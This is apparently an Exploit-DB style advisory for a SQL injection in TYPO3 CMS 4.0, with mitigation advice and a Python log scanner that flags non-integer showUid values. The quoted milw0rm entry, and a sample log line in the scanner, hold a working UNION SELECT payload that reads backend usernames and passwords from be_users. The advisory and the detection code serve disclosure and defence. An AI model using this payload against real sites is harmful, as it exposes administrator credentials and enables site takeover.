Vendor: TYPO3 CMS
By: CyberNaj, JxE-13
CVSS: 7.5 (HIGH)
Vulnerability: SQL injection
CWE: 89
Product Name: TYPO3 CMS
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:typo3:typo3_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

TYPO3 CMS 4.0 SQL-Injection Vulnerability

A SQL injection vulnerability exists in TYPO3 CMS 4.0. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application and execute arbitrary SQL commands in the application's database. This can allow the attacker to access or modify critical application data, compromise the application, access or modify data in the backend database, and mount various other attacks.

Mitigation:

Developers should never construct SQL statements directly from user input. Instead, parameterized statements should be used to avoid SQL injection attacks. Additionally, input validation should be used to detect malicious input early and prevent it from entering the system.
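
The input-validation half of this advice, applied to the `showUid` parameter named in the advisory below, as an added example that is not code from the advisory or from TYPO3: it flags any request whose `showUid` value is not a plain integer. The plugin name `tx_example`, the log lines, and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Record UIDs are plain non-negative integers; anything else fails validation.
UID_RE = re.compile(r"[0-9]{1,10}")
# Common/combined access log format: client address and request target.
LOG_RE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"'
)

# Constructed sample log lines (documentation addresses, hypothetical plugin name).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2009:10:00:00 +0000] '
    '"GET /index.php?id=12&tx_example[showUid]=42&cHash=abc123 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [06/Aug/2009:10:00:05 +0000] '
    '"GET /index.php?id=12&tx_example[showUid]=-1+union+select+username,2,password,'
    '4,5,6,7+from+be_users--&cHash=abc123 HTTP/1.1" 200 812',
    '192.0.2.78 - - [06/Aug/2009:10:00:09 +0000] '
    '"GET /index.php?id=12&tx_example%5BshowUid%5D=7%27&cHash=abc123 HTTP/1.1" 500 0',
]


def is_showuid_key(key):
    """True for showUid itself or any plugin-namespaced form such as ns[showUid]."""
    return key == "showUid" or key.endswith("[showUid]")


def invalid_showuid_values(target):
    """Return every decoded showUid value in the request target that is not an integer."""
    query = target.partition("?")[2]
    # parse_qsl percent-decodes keys and values, so encoded brackets are caught too.
    return [
        value
        for key, value in parse_qsl(query, keep_blank_values=True)
        if is_showuid_key(key) and not UID_RE.fullmatch(value)
    ]


def scan_access_log(lines):
    """Return (client, bad_values) for each request whose showUid fails validation."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if match:
            bad = invalid_showuid_values(match.group("target"))
            if bad:
                findings.append((match.group("client"), bad))
    return findings
```

The same integer check belongs in the application before the value reaches any query, alongside the parameterized statement, so that the log scan serves only as a second line of detection.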

Exploit-DB raw data:

#-----
TYPO3 CMS 4.0  SQL-Injection Vulnerability
#-----


 #####################################################
 # [+] Author        :  CyberNaj, JxE-13             #     
 # [+] Vulnerability :  SQL injection                #
 # [+] Group         :  Ro0T-MaFia                   #
 #####################################################

#-----

 Info CMS:

 * Name      : TYPO3
 * Web       : http://typo3.org
 * download  : http://typo3.org/download/packages/
 * Country   : Venezuela
               
#-----

Vulnerability:

http://www.host.com/index.php?id=[xxx][showUid]=[SQL-injection]&cHash=[xxx]

SQL-injection: -1+union+select+username,2,password,4,5,6,7+from+be_users--

Admin Panel: /typo3/index.php

#-----

# milw0rm.com [2009-08-06]